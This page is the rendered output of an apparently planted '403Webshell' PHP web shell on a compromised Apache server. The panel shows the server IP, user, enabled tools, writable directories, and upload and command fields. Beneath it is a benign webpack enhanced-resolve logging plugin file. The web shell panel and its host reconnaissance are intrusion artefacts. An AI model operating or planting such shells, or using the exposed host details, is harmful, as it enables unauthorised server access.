403Webshell
Server IP : 46.62.235.243  /  Your IP : 216.73.216.163
Web Server : Apache/2.4.58 (Ubuntu)
System : Linux Linkabili3Dicembre 6.8.0-100-generic #100-Ubuntu SMP PREEMPT_DYNAMIC Tue Jan 13 16:40:06 UTC 2026 x86_64
User : www-data ( 33)
PHP Version : 8.1.33
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : OFF  |  Sudo : ON  |  Pkexec : OFF
Directory :  /var/www/linkabili/node_modules/webpack-cli/node_modules/enhanced-resolve/lib/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /var/www/linkabili/node_modules/webpack-cli/node_modules/enhanced-resolve/lib/LogInfoPlugin.js
/*
	MIT License http://www.opensource.org/licenses/mit-license.php
	Author Tobias Koppers @sokra
*/
"use strict";

module.exports = class LogInfoPlugin {
	constructor(source) {
		this.source = source;
	}

	apply(resolver) {
		const source = this.source;
		resolver.getHook(this.source).tapAsync("LogInfoPlugin", (request, resolveContext, callback) => {
			if(!resolveContext.log) return callback();
			const log = resolveContext.log;
			const prefix = "[" + source + "] ";
			if(request.path) log(prefix + "Resolving in directory: " + request.path);
			if(request.request) log(prefix + "Resolving request: " + request.request);
			if(request.module) log(prefix + "Request is an module request.");
			if(request.directory) log(prefix + "Request is a directory request.");
			if(request.query) log(prefix + "Resolving request query: " + request.query);
			if(request.descriptionFilePath) log(prefix + "Has description data from " + request.descriptionFilePath);
			if(request.relativePath) log(prefix + "Relative path from description file is: " + request.relativePath);
			callback();
		});
	}
};

Youez - 2016 - github.com/yon3zu
LinuXploit